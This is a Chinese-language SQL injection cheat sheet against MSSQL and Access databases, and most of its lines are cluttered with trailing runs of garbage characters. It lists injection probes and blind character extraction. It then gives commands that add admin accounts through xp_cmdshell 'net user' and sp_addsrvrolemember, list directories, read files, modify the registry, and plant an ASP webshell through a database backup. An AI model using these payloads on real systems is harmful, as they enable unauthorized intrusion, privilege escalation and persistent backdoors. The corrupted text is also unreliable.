1.判断是否有注入;and 1=1 ;and 1=2 _FR_6*C)5�
2.初步判断是否是mssql ;and user>0 "H\1Z�,P<m
�1fU���g��
3.注入参数是字符'and [查询条件] and ''=' �B��|XrjI?
lLhvp���vT
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ;�+jz=9Q-�
jMr�[�U��Z
5.判断数据库系统 v�"Z��N�S�
yK9:LXh��f
;and (select count(*) from sysobjects)>0 mssql ��&8$Gy��u
�= Lt)15��
;and (select count(*) from msysobjects)>0 access RC?�gozBFJ
>�%LZ|*U��
�AQ��+MjS,
����ynY(�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Vi��1l^ Za
F#�Y9 �@E�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �$r+�_��Y/
4:wVT;?a�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 0])D)%�B
k
I8};�t b#
9.(1)猜字段的ascii值(access) uIh68�UM�
%����]G'u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7W[+����e&
�)<YfLDgTs
(2)猜字段的ascii值(mssql) �Hw2�9V //
�v
�*i�coj
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �O?,Grn%'.
Kcl~cIh7�7
10.测试权限结构(mssql) o0�ky]9�
P
Q�l�>bsr�}
�9B3+$u�P�
(-S\�%,h�O
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ak1�?MKV.�
�b:B+x6M��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��4�,�EX2
^Mv�g�m3hg
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6s�jd:~J:�
cvOCBg38BH
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �'�_�ZiZ4O
T8^�`<g�r.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Ob!����NC&
2����n�ra@
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- VN3�[B
eH
^5E:hW��[*
;and 1=(select IS_MEMBER('db_owner'));-- 6�5�]>6D43
*? V bo�yU
^���k J�>4
[/�=Z2mt�A
11.添加mssql和系统的帐户 Yw(�O}U 5e
&�ci;0�P#Q
;exec master.dbo.sp_addlogin username;-- m3#�rU%Wj�
;exec master.dbo.sp_password null,username,password;-- ��i�8w/�a�
~cv322�N �
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- L`�3;9r��O
^iA_<@[`X[
;exec master.dbo.xp_cmdshell 'net user username password NJ�^�Bv�`�
_w}��l,� �
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- k%�D|1�7I�
��gUr�#3#�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Uc%kyT�Bm1
���#nq$^�H
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �G22{',#r8
{�"PIS&]tR
3s\}�|LqX#
�;SgPF:T>Q
12.(1)遍历目录 L�l�f#g#T�
'nIKkQ" N
;create table dirs(paths varchar(100), id int) 3-/F]}�0y6
�>\?RYy,s$
;insert dirs exec master.dbo.xp_dirtree 'c:\' \X2��r?���
*Z8qd{.$q�
;and (select top 1 paths from dirs)>0 �U�ee�(��1
�s3-TBhAv�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��eC�{St0�
Nn#;�Kjul.
�<EKTFHJ�!
4^Ke?���;v
(2)遍历目录 {h�*�)�|J�
�-{XDQ{z<%
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��8|L;y[�v
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 #H��DP ha�
dL]�wu!�wE
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 b+�`qGJrej
oT�J^WePZQ
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��"c.@4#/_
�s^>�� >�]
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 W�ES$B7�y�
�kB��U`Q{.
S2jn � pf}
)�7�C+hQe�
13.mssql中的存储过程 W� ����m&*
!^'6&N�R#K
xp_regenumvalues 注册表根键, 子键 ]f~!Qk!I7r
>��fi_:��o
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 )g?ox�{Hol
]�J�R�2Av
xp_regread 根键,子键,键值名 70�4_ehrlE
�:b0|�v`FU
;exec xp_regread [�sNvCE$\]
�@#�=yC.�s
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 *C);IdhK%y
Tb:6IC�7="
xp_regwrite 根键,子键, 值名, 值类型, 值 ~ o=��kW2Y
7���,s5Gd-
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 X�[!S7[d-y
s�d9b9?qiu
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 I�!�#�WXK�
��8Vt�RRtl
xp_regdeletevalue 根键,子键,值名 Cg(&WJw(ep
�sd�%m{P2�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Ic���zMf%
J4x|Af�p�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �hSz_��e�
nAC>�']K4$
mp)+wZA�N&
lc�3N i<3v
14.mssql的backup创建webshell a�!EW[|[�Q
�;�t�� M��
use model �U�[?�f@.&
dT0>\9Z�Nr
create table cmd(str image); j#�Q�nu0�D
��^�(s(4|
insert into cmd(str) values (''); Z�~w2m�6;s
O!t�=,�F1j
backup database model to disk='c:\l.asp'; Ih�N^*P:Fo
lM�l'+ �yy
zGdYk-H3TH
|/ji��'B�h
15.mssql内置函数 � t3AmXx �
��18Vn[}]"
;and (select @@version)>0 获得Windows的版本号 6L;�]5)#�
==UYjbu��U
;and user_name()='dbo' 判断当前系统的连接用户是不是sa p�~���NHf\
�w��P�X�^P
;and (select user_name())>0 爆当前系统的连接用户 O^P�N{��u�
7GTD��e'�T
;and (select db_name())>0 得到当前连接的数据库 �CH�#K�0hi
�W~PMR�/^i
Yw
y�MC��d
+v~x_�E5FP
16.简洁的webshell \H9:%Tlp~4
]9P�G"<�^k
use model ftKL#9�,s(
�sj�Ov!|]A
create table cmd(str image); !"o\H(s�iT
K$:�+]fJ�K
insert into cmd(str) values (''); }g@
'��^�v
�Sl-9��im1
backup database model to disk='g:\wwwtest\l.asp';
